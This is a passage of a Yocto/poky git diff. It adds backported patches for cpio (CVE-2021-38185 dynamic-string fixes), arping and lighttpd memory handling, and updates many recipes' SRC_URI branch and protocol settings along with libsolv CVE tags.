*s, int c); ++ +diff --git a/src/util.c b/src/util.c +index 4421b20..6d6bbaa 100644 +--- a/src/util.c ++++ b/src/util.c +@@ -846,11 +846,9 @@ get_next_reel (int tape_des) + FILE *tty_out; /* File for interacting with user. */ + int old_tape_des; + char *next_archive_name; +- dynamic_string new_name; ++ dynamic_string new_name = DYNAMIC_STRING_INITIALIZER; + char *str_res; + +- ds_init (&new_name, 128); +- + /* Open files for interactive communication. */ + tty_in = fopen (TTY_NAME, "r"); + if (tty_in == NULL) +@@ -925,7 +923,7 @@ get_next_reel (int tape_des) + error (PAXEXIT_FAILURE, 0, _("internal error: tape descriptor changed from %d to %d"), + old_tape_des, tape_des); + +- free (new_name.ds_string); ++ ds_free (&new_name); + fclose (tty_in); + fclose (tty_out); + } +-- +2.25.1 + + +From fb7a51bf85b8e6f045cacb4fb783db4a414741bf Mon Sep 17 00:00:00 2001 +From: Sergey Poznyakoff +Date: Wed, 11 Aug 2021 18:10:38 +0300 +Subject: [PATCH 2/3] Fix previous commit + +* src/dstring.c (ds_reset,ds_concat): Don't call ds_resize in a +loop. +--- + src/dstring.c | 4 ++-- + 1 file changed, 2 insertions(+), 2 deletions(-) + +diff --git a/src/dstring.c b/src/dstring.c +index 358f356..90c691c 100644 +--- a/src/dstring.c ++++ b/src/dstring.c +@@ -64,7 +64,7 @@ void + ds_reset (dynamic_string *s, size_t len) + { + while (len > s->ds_size) +- ds_resize (s); ++ s->ds_string = x2nrealloc (s->ds_string, &s->ds_size, 1); + s->ds_idx = len; + } + +@@ -116,7 +116,7 @@ ds_concat (dynamic_string *s, char const *str) + { + size_t len = strlen (str); + while (len + 1 > s->ds_size) +- ds_resize (s); ++ s->ds_string = x2nrealloc (s->ds_string, &s->ds_size, 1); + memcpy (s->ds_string + s->ds_idx, str, len); + s->ds_idx += len; + s->ds_string[s->ds_idx] = 0; +-- +2.25.1 + + +From 86b37d74b15f9bb5fe62fd1642cc126d3ace0189 Mon Sep 17 00:00:00 2001 +From: Sergey Poznyakoff +Date: Wed, 18 Aug 2021 09:41:39 +0300 +Subject: [PATCH 3/3] Fix dynamic string reallocations + +* src/dstring.c (ds_resize): Take additional argument: number of +bytes to leave available after ds_idx. All uses changed. +--- + src/dstring.c | 18 ++++++++---------- + 1 file changed, 8 insertions(+), 10 deletions(-) + +diff --git a/src/dstring.c b/src/dstring.c +index 90c691c..0f597cc 100644 +--- a/src/dstring.c ++++ b/src/dstring.c +@@ -49,9 +49,9 @@ ds_free (dynamic_string *string) + /* Expand dynamic string STRING, if necessary. */ + + void +-ds_resize (dynamic_string *string) ++ds_resize (dynamic_string *string, size_t len) + { +- if (string->ds_idx == string->ds_size) ++ while (len + string->ds_idx >= string->ds_size) + { + string->ds_string = x2nrealloc (string->ds_string, &string->ds_size, + 1); +@@ -63,8 +63,7 @@ ds_resize (dynamic_string *string) + void + ds_reset (dynamic_string *s, size_t len) + { +- while (len > s->ds_size) +- s->ds_string = x2nrealloc (s->ds_string, &s->ds_size, 1); ++ ds_resize (s, len); + s->ds_idx = len; + } + +@@ -86,10 +85,10 @@ ds_fgetstr (FILE *f, dynamic_string *s, char eos) + /* Read the input string. */ + while ((next_ch = getc (f)) != eos && next_ch != EOF) + { +- ds_resize (s); ++ ds_resize (s, 0); + s->ds_string[s->ds_idx++] = next_ch; + } +- ds_resize (s); ++ ds_resize (s, 0); + s->ds_string[s->ds_idx] = '\0'; + + if (s->ds_idx == 0 && next_ch == EOF) +@@ -101,12 +100,12 @@ ds_fgetstr (FILE *f, dynamic_string *s, char eos) + void + ds_append (dynamic_string *s, int c) + { +- ds_resize (s); ++ ds_resize (s, 0); + s->ds_string[s->ds_idx] = c; + if (c) + { + s->ds_idx++; +- ds_resize (s); ++ ds_resize (s, 0); + s->ds_string[s->ds_idx] = 0; + } + } +@@ -115,8 +114,7 @@ void + ds_concat (dynamic_string *s, char const *str) + { + size_t len = strlen (str); +- while (len + 1 > s->ds_size) +- s->ds_string = x2nrealloc (s->ds_string, &s->ds_size, 1); ++ ds_resize (s, len); + memcpy (s->ds_string + s->ds_idx, str, len); + s->ds_idx += len; + s->ds_string[s->ds_idx] = 0; +-- +2.25.1 + diff --git a/poky/meta/recipes-extended/cpio/cpio_2.13.bb b/poky/meta/recipes-extended/cpio/cpio_2.13.bb index 6536257993..7c8a465cd0 100644 --- a/poky/meta/recipes-extended/cpio/cpio_2.13.bb +++ b/poky/meta/recipes-extended/cpio/cpio_2.13.bb @@ -9,6 +9,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=f27defe1e96c2e1ecd4e0c9be8967949" SRC_URI = "${GNU_MIRROR}/cpio/cpio-${PV}.tar.gz \ file://0001-Unset-need_charset_alias-when-building-for-musl.patch \ file://0002-src-global.c-Remove-superfluous-declaration-of-progr.patch \ + file://CVE-2021-38185.patch \ " SRC_URI[md5sum] = "389c5452d667c23b5eceb206f5000810" diff --git a/poky/meta/recipes-extended/cups/cups.inc b/poky/meta/recipes-extended/cups/cups.inc index 151ef065fe..15f46937e1 100644 --- a/poky/meta/recipes-extended/cups/cups.inc +++ b/poky/meta/recipes-extended/cups/cups.inc @@ -41,7 +41,7 @@ PACKAGECONFIG ??= "${@bb.utils.contains('DISTRO_FEATURES', 'zeroconf', 'avahi', PACKAGECONFIG[avahi] = "--enable-avahi,--disable-avahi,avahi" PACKAGECONFIG[acl] = "--enable-acl,--disable-acl,acl" PACKAGECONFIG[pam] = "--enable-pam --with-pam-module=unix, --disable-pam, libpam" -PACKAGECONFIG[systemd] = "--with-systemd=${systemd_system_unitdir},--without-systemd,systemd" +PACKAGECONFIG[systemd] = "--with-systemd=${systemd_system_unitdir},--disable-systemd,systemd" PACKAGECONFIG[xinetd] = "--with-xinetd=${sysconfdir}/xinetd.d,--without-xinetd,xinetd" EXTRA_OECONF = " \ diff --git a/poky/meta/recipes-extended/go-examples/go-helloworld_0.1.bb b/poky/meta/recipes-extended/go-examples/go-helloworld_0.1.bb index ab70ea98a3..7d0f74186e 100644 --- a/poky/meta/recipes-extended/go-examples/go-helloworld_0.1.bb +++ b/poky/meta/recipes-extended/go-examples/go-helloworld_0.1.bb @@ -5,7 +5,7 @@ HOMEPAGE = "https://golang.org/" LICENSE = "MIT" LIC_FILES_CHKSUM = "file://${COMMON_LICENSE_DIR}/MIT;md5=0835ade698e0bcf8506ecda2f7b4f302" -SRC_URI = "git://${GO_IMPORT}" +SRC_URI = "git://${GO_IMPORT};branch=master" SRCREV = "46695d81d1fae905a270fb7db8a4d11a334562fe" UPSTREAM_CHECK_COMMITS = "1" diff --git a/poky/meta/recipes-extended/iputils/iputils/0001-arping-make-update-neighbours-work-again.patch b/poky/meta/recipes-extended/iputils/iputils/0001-arping-make-update-neighbours-work-again.patch new file mode 100644 index 0000000000..bf86115843 --- /dev/null +++ b/poky/meta/recipes-extended/iputils/iputils/0001-arping-make-update-neighbours-work-again.patch @@ -0,0 +1,79 @@ +From 86ed08936d49e2c81ef49dfbd02aca1c74d0c098 Mon Sep 17 00:00:00 2001 +From: lac-0073 <61903197+lac-0073@users.noreply.github.com> +Date: Mon, 26 Oct 2020 09:45:42 +0800 +Subject: [PATCH] arpping: make update neighbours work again + +The arping is using inconsistent sender_ip_addr and target_ip_addr in +messages. This causes the client receiving the arp message not to update +the arp table entries. + +The specific performance is as follows: + +There is a machine 2 with IP 10.20.30.3 configured on eth0:0 that is in the +same IP subnet as eth0. This IP was originally used on another machine 1, +and th IP needs to be changed back to the machine 1. When using the arping +command to announce what ethernet address has IP 10.20.30.3, the arp table +on machine 3 is not updated. + +Machine 3 original arp table: + + 10.20.30.3 machine 2 eth0:0 00:00:00:00:00:02 + 10.20.30.2 machine 2 eth0 00:00:00:00:00:02 + 10.20.30.1 machine 1 eth0 00:00:00:00:00:01 + +Create interface eth0:0 on machine 1, and use the arping command to send arp +packets. Expected outcome on machine 3: + + 10.20.30.3 machine 1 eth0:0 00:00:00:00:00:01 + 10.20.30.2 machine 2 eth0 00:00:00:00:00:02 + 10.20.30.1 machine 1 eth0 00:00:00:00:00:01 + +Actual results on machine 3: + + 10.20.30.3 machine 2 eth0:0 00:00:00:00:00:02 + 10.20.30.2 machine 2 eth0 00:00:00:00:00:02 + 10.20.30.1 machine 1 eth0 00:00:00:00:00:01 + +Fixes: https://github.com/iputils/iputils/issues/298 +Fixes: 68f12fc4a0dbef4ae4c404da24040d22c5a14339 +Signed-off-by: Aichun Li +Upstream-Status: Backport [https://github.com/iputils/iputils/commit/86ed08936d49e2c81ef49dfbd02aca1c74d0c098] +Signed-off-by: Visa Hankala +--- + arping.c | 16 +++++++++------- + 1 file changed, 9 insertions(+), 7 deletions(-) + +diff --git a/arping.c b/arping.c +index a002786..53fdbb4 100644 +--- a/arping.c ++++ b/arping.c +@@ -968,7 +968,7 @@ int main(int argc, char **argv) + } + memset(&saddr, 0, sizeof(saddr)); + saddr.sin_family = AF_INET; +- if (!ctl.unsolicited && (ctl.source || ctl.gsrc.s_addr)) { ++ if (ctl.source || ctl.gsrc.s_addr) { + saddr.sin_addr = ctl.gsrc; + if (bind(probe_fd, (struct sockaddr *)&saddr, sizeof(saddr)) == -1) + error(2, errno, "bind"); +@@ -979,12 +979,14 @@ int main(int argc, char **argv) + saddr.sin_port = htons(1025); + saddr.sin_addr = ctl.gdst; + +- if (setsockopt(probe_fd, SOL_SOCKET, SO_DONTROUTE, (char *)&on, sizeof(on)) == -1) +- error(0, errno, _("WARNING: setsockopt(SO_DONTROUTE)")); +- if (connect(probe_fd, (struct sockaddr *)&saddr, sizeof(saddr)) == -1) +- error(2, errno, "connect"); +- if (getsockname(probe_fd, (struct sockaddr *)&saddr, &alen) == -1) +- error(2, errno, "getsockname"); ++ if (!ctl.unsolicited) { ++ if (setsockopt(probe_fd, SOL_SOCKET, SO_DONTROUTE, (char *)&on, sizeof(on)) == -1) ++ error(0, errno, _("WARNING: setsockopt(SO_DONTROUTE)")); ++ if (connect(probe_fd, (struct sockaddr *)&saddr, sizeof(saddr)) == -1) ++ error(2, errno, "connect"); ++ if (getsockname(probe_fd, (struct sockaddr *)&saddr, &alen) == -1) ++ error(2, errno, "getsockname"); ++ } + ctl.gsrc = saddr.sin_addr; + } + close(probe_fd); diff --git a/poky/meta/recipes-extended/iputils/iputils_s20190709.bb b/poky/meta/recipes-extended/iputils/iputils_s20190709.bb index d652bfcaad..a715d0a37b 100644 --- a/poky/meta/recipes-extended/iputils/iputils_s20190709.bb +++ b/poky/meta/recipes-extended/iputils/iputils_s20190709.bb @@ -10,7 +10,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=55aa8c9fcad0691cef0ecd420361e390" DEPENDS = "gnutls" -SRC_URI = "git://github.com/iputils/iputils \ +SRC_URI = "git://github.com/iputils/iputils;branch=master;protocol=https \ file://0001-ninfod-change-variable-name-to-avoid-colliding-with-.patch \ file://0001-ninfod-fix-systemd-Documentation-url-error.patch \ file://0001-rarpd-rdisc-Drop-PrivateUsers.patch \ @@ -20,6 +20,7 @@ SRC_URI = "git://github.com/iputils/iputils \ file://0003-arping-Fix-comparison-of-different-signedness-warnin.patch \ file://0004-arping-return-success-when-unsolicited-ARP-mode-dest.patch \ file://0005-arping-use-additional-timerfd-to-control-when-timeou.patch \ + file://0001-arping-make-update-neighbours-work-again.patch \ " SRCREV = "13e00847176aa23683d68fce1d17ffb523510946" diff --git a/poky/meta/recipes-extended/libaio/libaio_0.3.111.bb b/poky/meta/recipes-extended/libaio/libaio_0.3.111.bb index 8e1cd349a0..309ae53bfb 100644 --- a/poky/meta/recipes-extended/libaio/libaio_0.3.111.bb +++ b/poky/meta/recipes-extended/libaio/libaio_0.3.111.bb @@ -5,7 +5,7 @@ HOMEPAGE = "http://lse.sourceforge.net/io/aio.html" LICENSE = "LGPLv2.1+" LIC_FILES_CHKSUM = "file://COPYING;md5=d8045f3b8f929c1cb29a1e3fd737b499" -SRC_URI = "git://pagure.io/libaio.git;protocol=https \ +SRC_URI = "git://pagure.io/libaio.git;protocol=https;branch=master \ file://00_arches.patch \ file://destdir.patch \ file://libaio_fix_for_mips_syscalls.patch \ diff --git a/poky/meta/recipes-extended/libnsl/libnsl2_git.bb b/poky/meta/recipes-extended/libnsl/libnsl2_git.bb index 28c84af7ad..cbb38674b9 100644 --- a/poky/meta/recipes-extended/libnsl/libnsl2_git.bb +++ b/poky/meta/recipes-extended/libnsl/libnsl2_git.bb @@ -14,7 +14,7 @@ PV = "1.2.0+git${SRCPV}" SRCREV = "4a062cf4180d99371198951e4ea5b4550efd58a3" -SRC_URI = "git://github.com/thkukuk/libnsl \ +SRC_URI = "git://github.com/thkukuk/libnsl;branch=master;protocol=https \ " S = "${WORKDIR}/git" diff --git a/poky/meta/recipes-extended/libnss-nis/libnss-nis.bb b/poky/meta/recipes-extended/libnss-nis/libnss-nis.bb index a1d914e871..984cc98fc2 100644 --- a/poky/meta/recipes-extended/libnss-nis/libnss-nis.bb +++ b/poky/meta/recipes-extended/libnss-nis/libnss-nis.bb @@ -17,7 +17,7 @@ PV = "3.1+git${SRCPV}" SRCREV = "062f31999b35393abf7595cb89dfc9590d5a42ad" -SRC_URI = "git://github.com/thkukuk/libnss_nis \ +SRC_URI = "git://github.com/thkukuk/libnss_nis;branch=master;protocol=https \ " S = "${WORKDIR}/git" diff --git a/poky/meta/recipes-extended/libsolv/files/CVE-2021-3200.patch b/poky/meta/recipes-extended/libsolv/files/CVE-2021-3200.patch index 74164ab495..cc8f53cefd 100644 --- a/poky/meta/recipes-extended/libsolv/files/CVE-2021-3200.patch +++ b/poky/meta/recipes-extended/libsolv/files/CVE-2021-3200.patch @@ -11,9 +11,14 @@ been added. (Jobs may point inside the whatproviedes array, so we must not invalidate this area.) -Upstream-Status: Backport -https://github.com/openSUSE/libsolv/commit/0077ef29eb46d2e1df2f230fc95a1d9748d49dec +Upstream-Status: Backport [https://github.com/openSUSE/libsolv/commit/0077ef29eb46d2e1df2f230fc95a1d9748d49dec] CVE: CVE-2021-3200 +CVE: CVE-2021-33928 +CVE: CVE-2021-33929 +CVE: CVE-2021-33930 +CVE: CVE-2021-33938 +Signed-off-by: Ranjitsinh Rathod + Signed-off-by: Chee Yang Lee --- ext/testcase.c | 21 +++++++++++++++++++++ diff --git a/poky/meta/recipes-extended/libsolv/libsolv_0.7.10.bb b/poky/meta/recipes-extended/libsolv/libsolv_0.7.10.bb index eadf04aa5a..2c2aedc32c 100644 --- a/poky/meta/recipes-extended/libsolv/libsolv_0.7.10.bb +++ b/poky/meta/recipes-extended/libsolv/libsolv_0.7.10.bb @@ -8,7 +8,7 @@ LIC_FILES_CHKSUM = "file://LICENSE.BSD;md5=62272bd11c97396d4aaf1c41bc11f7d8" DEPENDS = "expat zlib" -SRC_URI = "git://github.com/openSUSE/libsolv.git \ +SRC_URI = "git://github.com/openSUSE/libsolv.git;branch=master;protocol=https \ file://CVE-2021-3200.patch \ " diff --git a/poky/meta/recipes-extended/lighttpd/lighttpd/0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch b/poky/meta/recipes-extended/lighttpd/lighttpd/0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch index f17bdce2c0..44b9136b05 100644 --- a/poky/meta/recipes-extended/lighttpd/lighttpd/0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch +++ b/poky/meta/recipes-extended/lighttpd/lighttpd/0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch @@ -1,4 +1,4 @@ -From 22afc5d9aaa215c3c87ba21c77d47da44ab3b113 Mon Sep 17 00:00:00 2001 +From f918d5ba6ff1d439822be063237aea2705ea27b8 Mon Sep 17 00:00:00 2001 From: Alexander Kanavin Date: Fri, 26 Aug 2016 18:20:32 +0300 Subject: [PATCH] Use pkg-config for pcre dependency instead of -config script. @@ -6,15 +6,16 @@ Subject: [PATCH] Use pkg-config for pcre dependency instead of -config script. RP 2014/5/22 Upstream-Status: Pending Signed-off-by: Alexander Kanavin + --- configure.ac | 16 ++++++++++++---- 1 file changed, 12 insertions(+), 4 deletions(-) diff --git a/configure.ac b/configure.ac -index 5383cec..c29a902 100644 +index dbddfb9..62cf17f 100644 --- a/configure.ac +++ b/configure.ac -@@ -651,10 +651,18 @@ AC_ARG_WITH([pcre], +@@ -748,10 +748,18 @@ AC_ARG_WITH([pcre], ) AC_MSG_RESULT([$WITH_PCRE]) @@ -37,6 +38,3 @@ index 5383cec..c29a902 100644 else AC_PATH_PROG([PCRECONFIG], [pcre-config]) if test -n "$PCRECONFIG"; then --- -2.15.0 - diff --git a/poky/meta/recipes-extended/lighttpd/lighttpd/0001-core-reuse-large-mem-chunks-fix-mem-usage-fixes-3033.patch b/poky/meta/recipes-extended/lighttpd/lighttpd/0001-core-reuse-large-mem-chunks-fix-mem-usage-fixes-3033.patch new file mode 100644 index 0000000000..e226366112 --- /dev/null +++ b/poky/meta/recipes-extended/lighttpd/lighttpd/0001-core-reuse-large-mem-chunks-fix-mem-usage-fixes-3033.patch @@ -0,0 +1,224 @@ +From a566fe4cc9f9d0ef9cfdcbc13159ef0644e91c9c Mon Sep 17 00:00:00 2001 +From: Glenn Strauss +Date: Wed, 23 Dec 2020 23:14:47 -0500 +Subject: [PATCH] reuse large mem chunks (fix mem usage) (fixes #3033) + +(cherry picked from commit 7ba521ffb4959f6f74a609d5d4acafc29a038337) + +(thx flynn) + +fix large memory usage for large file downloads from dynamic backends + +reuse or release large memory chunks + +x-ref: + "Memory Growth with PUT and full buffered streams" + https://redmine.lighttpd.net/issues/3033 + +Upstream-Status: Backport +Comment: Hunk refreshed to make it backword compatible. +https://redmine.lighttpd.net/projects/lighttpd/repository/14/revisions/7ba521ffb4959f6f74a609d5d4acafc29a038337 +Signed-off-by: Purushottam Choudhary + +--- + src/chunk.c | 99 +++++++++++++++++++++++++++++++++--------- + src/chunk.h | 2 + + src/http-header-glue.c | 2 +- + 3 files changed, 82 insertions(+), 21 deletions(-) + +diff --git a/src/chunk.c b/src/chunk.c +index 133308f..d7259b9 100644 +--- a/src/chunk.c ++++ b/src/chunk.c +@@ -28,16 +28,20 @@ + static size_t chunk_buf_sz = 8192; + static chunk *chunks, *chunks_oversized; + static chunk *chunk_buffers; ++static int chunks_oversized_n; + static array *chunkqueue_default_tempdirs = NULL; + static off_t chunkqueue_default_tempfile_size = DEFAULT_TEMPFILE_SIZE; + + void chunkqueue_set_chunk_size (size_t sz) + { +- chunk_buf_sz = sz > 0 ? ((sz + 1023) & ~1023uL) : 8192; ++ size_t x = 1024; ++ while (x < sz && x < (1u << 30)) x <<= 1; ++ chunk_buf_sz = sz > 0 ? x : 8192; + } + + void chunkqueue_set_tempdirs_default_reset (void) + { ++ chunk_buf_sz = 8192; + chunkqueue_default_tempdirs = NULL; + chunkqueue_default_tempfile_size = DEFAULT_TEMPFILE_SIZE; + } +@@ -120,15 +124,49 @@ static void chunk_free(chunk *c) { + free(c); + } + +-buffer * chunk_buffer_acquire(void) { ++static chunk * chunk_pop_oversized(size_t sz) { ++ /* future: might have buckets of certain sizes, up to socket buf sizes */ ++ if (chunks_oversized && chunks_oversized->mem->size >= sz) { ++ --chunks_oversized_n; ++ chunk *c = chunks_oversized; ++ chunks_oversized = c->next; ++ return c; ++ } ++ return NULL; ++} ++ ++static void chunk_push_oversized(chunk * const c, const size_t sz) { ++ if (chunks_oversized_n < 64 && chunk_buf_sz >= 4096) { ++ ++chunks_oversized_n; ++ chunk **co = &chunks_oversized; ++ while (*co && sz < (*co)->mem->size) co = &(*co)->next; ++ c->next = *co; ++ *co = c; ++ } ++ else ++ chunk_free(c); ++} ++ ++static buffer * chunk_buffer_acquire_sz(size_t sz) { + chunk *c; + buffer *b; +- if (chunks) { +- c = chunks; +- chunks = c->next; ++ if (sz <= chunk_buf_sz) { ++ if (chunks) { ++ c = chunks; ++ chunks = c->next; ++ } ++ else ++ c = chunk_init(chunk_buf_sz); ++ /* future: might choose to pop from chunks_oversized, if available ++ * (even if larger than sz) rather than allocating new chunk ++ * (and if doing so, might replace chunks_oversized_n) */ + } + else { +- c = chunk_init(chunk_buf_sz); ++ /*(round up to nearest chunk_buf_sz)*/ ++ sz = (sz + (chunk_buf_sz-1)) & ~(chunk_buf_sz-1); ++ c = chunk_pop_oversized(sz); ++ if (NULL == c) ++ c = chunk_init(sz); + } + c->next = chunk_buffers; + chunk_buffers = c; +@@ -137,21 +175,47 @@ buffer * chunk_buffer_acquire(void) { + return b; + } + ++buffer * chunk_buffer_acquire(void) { ++ return chunk_buffer_acquire_sz(chunk_buf_sz); ++} ++ + void chunk_buffer_release(buffer *b) { + if (NULL == b) return; +- if (b->size >= chunk_buf_sz && chunk_buffers) { ++ if (chunk_buffers) { + chunk *c = chunk_buffers; + chunk_buffers = c->next; + c->mem = b; +- c->next = chunks; +- chunks = c; + buffer_clear(b); ++ if (b->size == chunk_buf_sz) { ++ c->next = chunks; ++ chunks = c; ++ } ++ else if (b->size > chunk_buf_sz) ++ chunk_push_oversized(c, b->size); ++ else ++ chunk_free(c); + } + else { + buffer_free(b); + } + } + ++size_t chunk_buffer_prepare_append(buffer * const b, size_t sz) { ++ if (sz > chunk_buffer_string_space(b)) { ++ sz += b->used ? b->used : 1; ++ buffer * const cb = chunk_buffer_acquire_sz(sz); ++ /* swap buffer contents and copy original b->ptr into larger b->ptr */ ++ /*(this does more than buffer_move())*/ ++ buffer tb = *b; ++ *b = *cb; ++ *cb = tb; ++ if ((b->used = tb.used)) ++ memcpy(b->ptr, tb.ptr, tb.used); ++ chunk_buffer_release(cb); ++ } ++ return chunk_buffer_string_space(b); ++} ++ + static chunk * chunk_acquire(size_t sz) { + if (sz <= chunk_buf_sz) { + if (chunks) { +@@ -162,13 +226,10 @@ static chunk * chunk_acquire(size_t sz) { + sz = chunk_buf_sz; + } + else { +- sz = (sz + 8191) & ~8191uL; +- /* future: might have buckets of certain sizes, up to socket buf sizes*/ +- if (chunks_oversized && chunks_oversized->mem->size >= sz) { +- chunk *c = chunks_oversized; +- chunks_oversized = c->next; +- return c; +- } ++ /*(round up to nearest chunk_buf_sz)*/ ++ sz = (sz + (chunk_buf_sz-1)) & ~(chunk_buf_sz-1); ++ chunk *c = chunk_pop_oversized(sz); ++ if (c) return c; + } + + return chunk_init(sz); +@@ -183,10 +244,7 @@ static void chunk_release(chunk *c) { + } + else if (sz > chunk_buf_sz) { + chunk_reset(c); +- chunk **co = &chunks_oversized; +- while (*co && sz < (*co)->mem->size) co = &(*co)->next; +- c->next = *co; +- *co = c; ++ chunk_push_oversized(c, sz); + } + else { + chunk_free(c); +@@ -205,6 +263,7 @@ void chunkqueue_chunk_pool_clear(void) + chunk_free(c); + } + chunks_oversized = NULL; ++ chunks_oversized_n = 0; + } + + void chunkqueue_chunk_pool_free(void) +diff --git a/src/chunk.h b/src/chunk.h +index 4c6b7e4..93f343c 100644 +--- a/src/chunk.h ++++ b/src/chunk.h +@@ -50,6 +50,8 @@ typedef struct { + buffer * chunk_buffer_acquire(void); + void chunk_buffer_release(buffer *b); + ++size_t chunk_buffer_prepare_append (buffer *b, size_t sz); ++ + void chunkqueue_chunk_pool_clear(void); + void chunkqueue_chunk_pool_free(void); + +diff --git a/src/http-header-glue.c b/src/http-header-glue.c +index d54f00c..2231fba 100644 +--- a/src/http-header-glue.c ++++ b/src/http-header-glue.c +@@ -1267,7 +1267,7 @@ handler_t http_response_read(server *srv, connection *con, http_response_opts *o + if (avail < toread) { + /*(add avail+toread to reduce allocations when ioctl EOPNOTSUPP)*/ + avail = avail ? avail - 1 + toread : toread; +- buffer_string_prepare_append(b, avail); ++ avail = chunk_buffer_prepare_append(b, avail); + } + + n = read(fd, b->ptr+buffer_string_length(b), avail); diff --git a/poky/meta/recipes-extended/lighttpd/lighttpd/default-chunk-size-8k.patch b/poky/meta/recipes-extended/lighttpd/lighttpd/default-chunk-size-8k.patch new file mode 100644 index 0000000000..fd75ca6e26 --- /dev/null +++ b/poky/meta/recipes-extended/lighttpd/lighttpd/default-chunk-size-8k.patch @@ -0,0 +1,35 @@ +From 2e08ee1d404e308f15551277e92b7605ddfa96a8 Mon Sep 17 00:00:00 2001 +From: Glenn Strauss +Date: Fri, 29 Nov 2019 18:18:52 -0500 +Subject: [PATCH] default chunk size 8k (was 4k) + +Upstream-Status: Backport +Comment: No hunk refreshed +https://git.lighttpd.net/lighttpd/lighttpd1.4/commit/304e46d4f808c46cbb025edfacf2913a30ce8855 +Signed-off-by: Purushottam Choudhary +--- + src/chunk.c | 4 ++-- + 1 file changed, 2 insertions(+), 2 deletions(-) + +diff --git a/src/chunk.c b/src/chunk.c +index 09dd3f1..133308f 100644 +--- a/src/chunk.c ++++ b/src/chunk.c +@@ -25,7 +25,7 @@ + #define DEFAULT_TEMPFILE_SIZE (1 * 1024 * 1024) + #define MAX_TEMPFILE_SIZE (128 * 1024 * 1024) + +-static size_t chunk_buf_sz = 4096; ++static size_t chunk_buf_sz = 8192; + static chunk *chunks, *chunks_oversized; + static chunk *chunk_buffers; + static array *chunkqueue_default_tempdirs = NULL; +@@ -33,7 +33,7 @@ static off_t chunkqueue_default_tempfile_size = DEFAULT_TEMPFILE_SIZE; + + void chunkqueue_set_chunk_size (size_t sz) + { +- chunk_buf_sz = sz > 0 ? ((sz + 1023) & ~1023uL) : 4096; ++ chunk_buf_sz = sz > 0 ? ((sz + 1023) & ~1023uL) : 8192; + } + + void chunkqueue_set_tempdirs_default_reset (void) diff --git a/poky/meta/recipes-extended/lighttpd/lighttpd_1.4.55.bb b/poky/meta/recipes-extended/lighttpd/lighttpd_1.4.55.bb index 35a268a03f..737d6ebf7c 100644 --- a/poky/meta/recipes-extended/lighttpd/lighttpd_1.4.55.bb +++ b/poky/meta/recipes-extended/lighttpd/lighttpd_1.4.55.bb @@ -18,6 +18,8 @@ SRC_URI = "http://download.lighttpd.net/lighttpd/releases-1.4.x/lighttpd-${PV}.t file://lighttpd.conf \ file://lighttpd \ file://0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch \ + file://default-chunk-size-8k.patch \ + file://0001-core-reuse-large-mem-chunks-fix-mem-usage-fixes-3033.patch \ " SRC_URI[md5sum] = "be4bda2c28bcbdac6eb941528f6edf03" diff --git a/poky/meta/recipes-extended/ltp/ltp_20200120.bb b/poky/meta/recipes-extended/ltp/ltp_20200120.bb index 6633755a20..505b7b14fc 100644 --- a/poky/meta/recipes-extended/ltp/ltp_20200120.bb +++ b/poky/meta/recipes-extended/ltp/ltp_20200120.bb @@ -29,7 +29,7 @@ CFLAGS_append_powerpc64 = " -D__SANE_USERSPACE_TYPES__" CFLAGS_append_mipsarchn64 = " -D__SANE_USERSPACE_TYPES__" SRCREV = "4079aaf264d0e9ead042b59d1c5f4e643620d0d5" -SRC_URI = "git://github.com/linux-test-project/ltp.git \ +SRC_URI = "git://github.com/linux-test-project/ltp.git;branch=master;protocol=https \ file://0001-build-Add-option-to-select-libc-implementation.patch \ file://0003-Check-if-__GLIBC_PREREQ-is-defined-before-using-it.patch \ file://0004-guard-mallocopt-with-__GLIBC__.patch \ diff --git a/poky/meta/recipes-extended/newt/libnewt_0.52.21.bb b/poky/meta/recipes-extended/newt/libnewt_0.52.21.bb index 88b4cf4a03..3d35a17c92 100644 --- a/poky/meta/recipes-extended/newt/libnewt_0.52.21.bb +++ b/poky/meta/recipes-extended/newt/libnewt_0.52.21.bb @@ -29,7 +29,7 @@ SRC_URI[sha256sum] = "265eb46b55d7eaeb887fca7a1d51fe115658882dfe148164b6c49fccac S = "${WORKDIR}/newt-${PV}" -inherit autotools-brokensep python3native python3-dir +inherit autotools-brokensep python3native python3-dir python3targetconfig EXTRA_OECONF = "--without-tcl --with-python" diff --git a/poky/meta/recipes-extended/procps/procps_3.3.16.bb b/poky/meta/recipes-extended/procps/procps_3.3.16.bb index 2810ebd285..3a8289b359 100644 --- a/poky/meta/recipes-extended/procps/procps_3.3.16.bb +++ b/poky/meta/recipes-extended/procps/procps_3.3.16.bb @@ -12,7 +12,7 @@ DEPENDS = "ncurses" inherit autotools gettext pkgconfig update-alternatives -SRC_URI = "git://gitlab.com/procps-ng/procps.git;protocol=https \ +SRC_URI = "git://gitlab.com/procps-ng/procps.git;protocol=https;branch=master \ file://sysctl.conf \ " SRCREV = "59c88e18f29000ceaf7e5f98181b07be443cf12f" diff --git a/poky/meta/recipes-extended/psmisc/psmisc_23.3.bb b/poky/meta/recipes-extended/psmisc/psmisc_23.3.bb index e569f1074b..36e6775f9e 100644 --- a/poky/meta/recipes-extended/psmisc/psmisc_23.3.bb +++ b/poky/meta/recipes-extended/psmisc/psmisc_23.3.bb @@ -2,7 +2,7 @@ require psmisc.inc LICENSE = "GPLv2" LIC_FILES_CHKSUM = "file://COPYING;md5=0636e73ff0215e8d672dc4c32c317bb3" -SRC_URI = "git://gitlab.com/psmisc/psmisc.git;protocol=https \ +SRC_URI = "git://gitlab.com/psmisc/psmisc.git;protocol=https;branch=master \ file://0001-Use-UINTPTR_MAX-instead-of-__WORDSIZE.patch \ " SRCREV = "78bde849041e6c914a2a517ebe1255b86dc98772" diff --git a/poky/meta/recipes-extended/rpcsvc-proto/rpcsvc-proto.bb b/poky/meta/recipes-extended/rpcsvc-proto/rpcsvc-proto.bb index cb5b288c48..0f8a6f74f8 100644 --- a/poky/meta/recipes-extended/rpcsvc-proto/rpcsvc-proto.bb +++ b/poky/meta/recipes-extended/rpcsvc-proto/rpcsvc-proto.bb @@ -19,7 +19,7 @@ PV = "1.4+git${SRCPV}" SRCREV = "9bc3b5b785723cfff459b0c01b39d87d4bed975c" -SRC_URI = "git://github.com/thkukuk/${BPN} \ +SRC_URI = "git://github.com/thkukuk/${BPN};branch=master;protocol=https \ file://0001-Use-cross-compiled-rpcgen.patch 